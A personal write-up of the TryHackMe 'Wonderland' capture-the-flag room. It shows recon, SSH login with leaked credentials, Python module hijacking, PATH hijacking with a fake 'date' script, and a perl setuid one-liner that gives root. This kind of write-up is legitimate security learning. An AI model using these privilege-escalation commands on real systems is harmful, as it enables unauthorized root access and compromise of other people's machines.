Wonderland

>sudo nmap -sT -sC -A -Pn -T4 10.10.125.79

Port 22 and 80 open

Started gobuster and browsed the site

>gobuster dir -w /dirbuster/2.3.3-medium -u 10.10.125.79

The webpage is just some text and a jpg. Nothing in source code or robots.txt

gobuster found a /r/ directory

Browsing to it reveals another page that encourages that we are on the right track

Ran gobuster on this new directory

>gobuster dir -w /dirbuster/2.3.3-medium -u 10.10.125.79/r

Found a /a directory

Guess that it might spell rabbit and it did

10.10.125.79/r/a/b/b/i/t

Browsing to this page revealed More text and a jpg. Looking through the source code revealed a username and password hidden

Used these creds to login through ssh. Got a shell. nice

alice:HowDothTheLittleCrocodileImproveHisShiningTail

In the directory we land in, /home/alice, we find a python file.

Cating out this file reveals that is a poem random generator. It loads a random.py library.

sudo -l shows that we can run this python file as user rabbit using sudo

>python3 -c 'import sys; print (sys.path)'

Running this command will show that our current directory will execute on PATH before python/lib

If we create a random.py file which loads a python shell, we can escalate to rabbit.

nano random.py

import os
os.system("/bin/bash")

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrusandthe_carpenter.py

Now we are rabbit. Moving to hatter's home directory shows an executable called teaParty

Here I had to look at a walkthrough to understand wtf to do. However, moving this program to our machine and running Strings on it would show that it runs to commands during execution. echo and date.

We can make a malicous bash file called date in the /tmp directory since it is world writable, make it executable, and export /tmp to PATH. This will have the effect of calling our date file before actual date and escalate us.

>cd /tmp

nano date

#!/bin/bash
/bin/bash

>chmod +x date

>export PATH:/tmp:$PATH

>cd /home/rabbit

>./teaParty

Now we are hatter. CDing to /home/hatter shows a password.txt file

cating it out shows a password. This is important later but we ssh in as hatter with this password to get a stable uid and gid for hatter

>ssh [email protected]:<password>

Moving to /tmp, I wgeted linpeas and ran it. It showed an suid capabilites for perl. Straight to GTFObins and we find that running a capabilites bin will escalate us.

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Boom root. cool. That room is neat and gives me more ideas about privilege escalation in the future. A lot more

PreviousTryHackMe Labs NextGhostcat

Last updated 3 years ago